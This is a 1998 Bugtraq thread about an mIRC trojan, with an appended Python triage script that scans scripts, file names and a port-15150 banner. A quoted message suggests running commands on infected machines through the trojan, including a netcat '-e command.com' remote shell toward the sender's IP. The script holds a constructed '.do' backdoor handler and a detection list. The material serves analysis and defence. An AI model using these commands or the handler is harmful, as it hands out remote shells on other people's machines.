
Bugtraq archives for 4th quarter (Oct-Dec) 1998: Re: Internet Wide DOS Attack using IRC

Re: Internet Wide DOS Attack using IRC

Samuel Cossette (clusterVIDEOTRON.CA)
Sat, 3 Oct 1998 14:41:54 -0400

It's not the DO command of mIRC, it's a built-in command; it's the equivalent
of /QUOTE or /RAW in an IRC client, which sends the data directly to the
server.

At this time I have found 2 files that are directly infected:

Packet Handler Firewall and FlashFXP v1.0, both distributed on an XDCC bot on
#warez950-dcc, in a zip file with some fake .nfo files and a SETUP.EXE (oce.exe)
of 354k. quicktools.ocx (EZFTP OLE Control Module) and Mswinsck.ocx are also
included.

Another interesting thing: the server opens port 15150, and this is the prompt:
"Enter your username:", probably an FTPD.

The trojan can also modify your mirc.ini, that is, add auto-op, and modify
your current script.

>
>With the DO command enabled, they gave us the means to remotely disable
>this trojan.
>
>Something to the effect of;
>
>msg <nick> .do del c:\windows\system\oce*.*
>
>Then, msg <nick> .do <some evil command to lock up the machine, forcing a
>reboot>.
>

...
>
>The mIRC DO command is very powerful, and can be used to install netcat on
>the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L
>-p <any port> <your ip> -t -e command.com, giving a remote command prompt
>to investigate/disinfect the machine.
>
>
>______________________________________________________________________________
>George Imburgia                                      e-mail:  gtihopi.dtcc.edu
>Systems Administrator                                Phone:  (302)739-4068
>Delaware Technical & Community College               Fax:    (302)739-3345
>Office of the President                              Pager:  (302)741-5962

Samuel Cossette
clustervideotron.ca
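The thread gives three concrete indicators for this trojan: a mIRC remote handler that takes a ".do" message from anyone and executes the rest of the line, a dropped installer (oce.exe) with two OCX files, and a listener on TCP 15150 that prompts "Enter your username:". The following triage script, an added example that is not code from the original post or from mIRC, checks a loaded mIRC script for message-driven handlers that can run host commands or send raw protocol, matches a directory listing against the dropped file names, and fingerprints the port-15150 banner. The trojan's own script is not on the page, so the sample script below and the localhost listener that stands in for the backdoor are constructed; the list of "dangerous" mIRC commands and the exact event-line grammar are my assumptions about typical mIRC remotes, not something the post states.

```python
"""Triage helpers for the mIRC ".do" trojan discussed in the thread.

Added example, not the trojan's code and not mIRC's own code. The sample
script and the local listener are constructed to mimic what the post
describes: a remote handler that runs whatever follows ".do", and a TCP
service on port 15150 that greets with "Enter your username:".
"""
import re
import socket
import threading

BACKDOOR_PORT = 15150                       # stated in the post
BACKDOOR_BANNER = b"Enter your username:"   # stated in the post
DROPPED_FILES = {"oce.exe", "quicktools.ocx", "mswinsck.ocx"}  # stated in the post

# A mIRC remote event line: "on <level>:<EVENT>:<matchtext>:<target>:<commands>"
# (assumed grammar for the events a chat message can trigger).
EVENT_RE = re.compile(r"^\s*on\s+[^:]+:(TEXT|ACTION|NOTICE|INPUT|CTCP\w*):([^:]*):", re.I)
# mIRC commands that let a stranger touch the host or speak raw protocol to the
# server (assumed list; "raw"/"quote" is the built-in the post says was abused).
DANGEROUS_RE = re.compile(
    r"(?:^|[\s{|/])(?:run|dll|write|remove|rename|copy|raw|quote|\$decode)\b", re.I)

# Constructed sample script, modelled on the ".do" remote described in the thread.
SAMPLE_SCRIPT = """\
; constructed sample, not the real trojan
on *:TEXT:hello*:#:{ msg $chan hi $nick }
on *:TEXT:.do *:?:{
  run $2-
  msg $nick done
}
on *:TEXT:.raw *:?: raw $2-
"""


def scan_mirc_script(text):
    """Return (line_no, trigger, command) for every message-driven handler whose
    body can execute a host command or send raw protocol. Handlers may be
    one-liners or brace-delimited blocks; blocks are scanned as a whole."""
    findings = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = EVENT_RE.match(lines[i])
        if not m:
            i += 1
            continue
        start, trigger = i, m.group(2).strip()
        body = [lines[i]]
        if lines[i].rstrip().endswith("{"):      # collect the { ... } block
            depth = 1
            while depth and i + 1 < len(lines):
                i += 1
                body.append(lines[i])
                depth += lines[i].count("{") - lines[i].count("}")
        hit = DANGEROUS_RE.search("\n".join(body))
        if hit:
            findings.append((start + 1, trigger, hit.group(0).strip(" {|/")))
        i += 1
    return findings


def suspicious_files(names):
    """Names from a directory listing (e.g. windows\\system) that match the files
    the post says the installer drops; case-insensitive because it is Windows."""
    return sorted(n for n in names if n.lower() in DROPPED_FILES)


def grab_banner(host, port, timeout=2.0):
    """Connect and return whatever the service sends first (b"" on silence)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(64)
        except socket.timeout:
            return b""


def looks_like_backdoor(banner):
    """True when the greeting matches the prompt reported on port 15150."""
    return banner.strip().startswith(BACKDOOR_BANNER)


def _fake_backdoor_listener():
    """Constructed stand-in for the trojan's service so the check runs offline.
    Binds an ephemeral localhost port, answers one client, then closes."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(5)

    def serve():
        try:
            conn, _ = srv.accept()
            conn.sendall(BACKDOOR_BANNER + b" ")
            conn.close()
        finally:
            srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo_banner_check():
    """Fingerprint the constructed listener the way one would probe port 15150."""
    port = _fake_backdoor_listener()
    return looks_like_backdoor(grab_banner("127.0.0.1", port))


if __name__ == "__main__":
    for line_no, trigger, cmd in scan_mirc_script(SAMPLE_SCRIPT):
        print(f"line {line_no}: handler for '{trigger}' calls '{cmd}'")
    print("dropped files:", suspicious_files(["Mswinsck.ocx", "kernel32.dll", "OCE.EXE"]))
    print("backdoor banner seen:", demo_banner_check())
```

Against a real host, point `grab_banner` at the machine and `BACKDOOR_PORT`, and feed `scan_mirc_script` each file listed under mirc.ini's remote-script section; the handler scan is the part worth keeping, since the same ".do"-style remote appears in many mIRC trojans regardless of which files they drop.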